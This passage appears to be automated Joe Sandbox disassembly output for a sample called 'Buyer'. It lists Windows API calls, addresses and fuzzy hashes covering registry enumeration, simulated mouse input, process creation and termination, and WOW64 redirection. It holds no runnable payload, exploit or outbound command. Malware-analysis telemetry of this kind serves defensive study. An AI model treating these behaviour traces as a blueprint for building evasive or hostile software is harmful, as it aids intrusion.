                                                                                                    • __freea.LIBCMT ref: 00F76735
                                                                                                      • Part of subcall function 00F73B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    • __freea.LIBCMT ref: 00F7673E
                                                                                                    • __freea.LIBCMT ref: 00F76763
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: a37e347dc3d4c5e863f95df6b5328c2b787a7601b18ac32b13eae6845476e4f5
                                                                                                    • Instruction ID: cf5b26953283130c58e76b10498320c71e920a15e22327f5b08c549e5463eafe
                                                                                                    • Opcode Fuzzy Hash: a37e347dc3d4c5e863f95df6b5328c2b787a7601b18ac32b13eae6845476e4f5
                                                                                                    • Instruction Fuzzy Hash: 0951F872A00656AFDB298F64CC81EBB77A9EF447A4F14862EFC08DA140DF34DC45E652
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FCD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCBE35,?,?), ref: 00FCD13C
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD178
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD1E6
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD21C
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCC451
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FCC4AC
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCC4F1
                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FCC520
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FCC57A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FCC586
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1120388591-0
                                                                                                    • Opcode ID: 70fb71d18e60ba1ad010652669298a7eaeeef36a18f4cd3bb03296c90be6f5c3
                                                                                                    • Instruction ID: 92dde5ca78c74c23848aa5aaa5a0bbaebf4b00162aaaa4abc7e6f28271dd8cef
                                                                                                    • Opcode Fuzzy Hash: 70fb71d18e60ba1ad010652669298a7eaeeef36a18f4cd3bb03296c90be6f5c3
                                                                                                    • Instruction Fuzzy Hash: D181C131508242AFC714DF24C995F2ABBE9FF84314F14895CF4598B2A2CB35ED46EB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00FB9C54
                                                                                                    • _wcslen.LIBCMT ref: 00FB9C75
                                                                                                    • _wcslen.LIBCMT ref: 00FB9C9C
                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00FB9CF4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                    • String ID: X
                                                                                                    • API String ID: 83654149-3081909835
                                                                                                    • Opcode ID: 663c3ed3e5c32d7eb15adf5b3589103691a4ec7e482236bf5462fb638e94ff3f
                                                                                                    • Instruction ID: 0bc5d026e1f436808b1d2e4a44f5b4ed7f7837c5ee096bb1bd0769dd4d8a453e
                                                                                                    • Opcode Fuzzy Hash: 663c3ed3e5c32d7eb15adf5b3589103691a4ec7e482236bf5462fb638e94ff3f
                                                                                                    • Instruction Fuzzy Hash: 3FE1B3719083108FC714EF25C881BAABBE5BF84314F14896DF9899B2A2DB74DD05DF92
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FB6C4B
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00FB6DA8
                                                                                                    • CoCreateInstance.OLE32(00FE0CE0,00000000,00000001,00FE0B50,?), ref: 00FB6DBF
                                                                                                    • CoUninitialize.OLE32 ref: 00FB7043
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                    • String ID: .lnk
                                                                                                    • API String ID: 886957087-24824748
                                                                                                    • Opcode ID: 8f22a52caaf3ea59f19015ac74627380ba17a09f904bf6f0c0cbd85f958248dd
                                                                                                    • Instruction ID: b9e53b3db2ae8d8cd623ac39e8286a9b24b67afccede809c3992a159e18387e9
                                                                                                    • Opcode Fuzzy Hash: 8f22a52caaf3ea59f19015ac74627380ba17a09f904bf6f0c0cbd85f958248dd
                                                                                                    • Instruction Fuzzy Hash: 14D15971608301AFD304EF25C881AABBBE8FF88714F14491DF5958B2A2DB74ED45DB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00F59477
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F594DB
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00F594F8
                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F59509
                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00F59557
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F977FA
                                                                                                      • Part of subcall function 00F5956F: BeginPath.GDI32(00000000), ref: 00F5958D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                    • String ID:
                                                                                                    • API String ID: 3050599898-0
                                                                                                    • Opcode ID: 15acdfddef5224f249a08f84ef65be178917fe62a45a0078f47ef603e01d86b7
                                                                                                    • Instruction ID: 848106332c17173518fb95f903f9bad6f21a593253327c0ac68718dc3c1b9e8a
                                                                                                    • Opcode Fuzzy Hash: 15acdfddef5224f249a08f84ef65be178917fe62a45a0078f47ef603e01d86b7
                                                                                                    • Instruction Fuzzy Hash: 8541E131509304DFDB21DF28CC84F767BE9EB45371F140229FAA8862A1D7799849EB62
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FB0EDD
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00FB0F18
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00FB0F34
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00FB0FAD
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00FB0FC4
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FB0FF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F9F95A,00000000,?,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00FD8938
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00FD895E
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FD89BD
                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 00FD89D1
                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00FD89F7
                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FD8A1B
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00FC2A6F
                                                                                                      • Part of subcall function 00FBEC5D: GetWindowRect.USER32(?,?), ref: 00FBEC75
                                                                                                    • GetDesktopWindow.USER32 ref: 00FC2A99
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FC2AA0
                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00FC2ADC
                                                                                                    • GetCursorPos.USER32(?), ref: 00FC2B08
                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FC2B66
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00FA538E
                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FA53AB
                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FA53E3
                                                                                                    • _wcslen.LIBCMT ref: 00FA5401
                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FA5409
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00FA5413
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD83D1
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FD83F6
                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FD840E
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00FD8437
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FBBF1C,00000000), ref: 00FD8457
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00FD8442
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FA1BE1
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00FA1BE8
                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FA1BF7
                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00FA1C02
                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FA1C31
                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FA1C45
                                                                                                    Similarity
                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00F636C9,00F63335), ref: 00F636E0
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F636EE
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F63707
                                                                                                    • SetLastError.KERNEL32(00000000,?,00F636C9,00F63335), ref: 00F63759
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00000000,00F64D33,00000000,?,?,00F668C2,?,?,00000000), ref: 00F730C8
                                                                                                    • _free.LIBCMT ref: 00F730FB
                                                                                                    • _free.LIBCMT ref: 00F73123
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F73130
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F7313C
                                                                                                    • _abort.LIBCMT ref: 00F73142
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F5986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F598C9
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F598D8
                                                                                                      • Part of subcall function 00F5986F: BeginPath.GDI32(?), ref: 00F598EF
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F59918
                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FD913A
                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00FD914E
                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FD915C
                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00FD916C
                                                                                                    • EndPath.GDI32(?), ref: 00FD917C
                                                                                                    • StrokePath.GDI32(?), ref: 00FD918C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 43455801-0
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00FA5911
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FA5922
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA5929
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00FA5931
                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FA5948
                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00FA595A
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    APIs
                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F42ABE
                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F42AC6
                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F42AD1
                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F42ADC
                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F42AE4
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F42AEC
                                                                                                    Similarity
                                                                                                    • API ID: Virtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4278518827-0
                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FAF171
                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FAF187
                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00FAF196
                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAF1A5
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAF1AF
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAF1B6
                                                                                                    Similarity
                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 839392675-0
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00F97A62
                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F97A79
                                                                                                    • GetWindowDC.USER32(?), ref: 00F97A85
                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00F97A94
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00F97AA6
                                                                                                    • GetSysColor.USER32(00000005), ref: 00F97AC0
                                                                                                    Similarity
                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 272304278-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FACCD3
                                                                                                    • _wcslen.LIBCMT ref: 00FACD1A
                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FACD81
                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FACDAF
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                    APIs
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00FCB62A
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00FCB6BF
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCB6EE
                                                                                                    Similarity
                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                    • String ID: <$@
                                                                                                    • API String ID: 146682121-1426351568
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FA78FF
                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FA7935
                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FA7946
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FA79C8
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                    • String ID: DllGetClassObject
                                                                                                    • API String ID: 753597075-1075368562
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FD45F3
                                                                                                    • IsMenu.USER32(?), ref: 00FD4608
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FD4650
                                                                                                    • DrawMenuBar.USER32 ref: 00FD4663
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FA2548
                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FA255B
                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FA258B
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FD374B
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00FD3752
                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FD3767
                                                                                                    • DestroyWindow.USER32(?), ref: 00FD376F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                    • String ID: SysAnimate32
                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F6506E,?,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002), ref: 00F650DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F650F0
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00F6506E,?,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002,00000000), ref: 00F65113
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F454C1
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-3689287502
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F45475
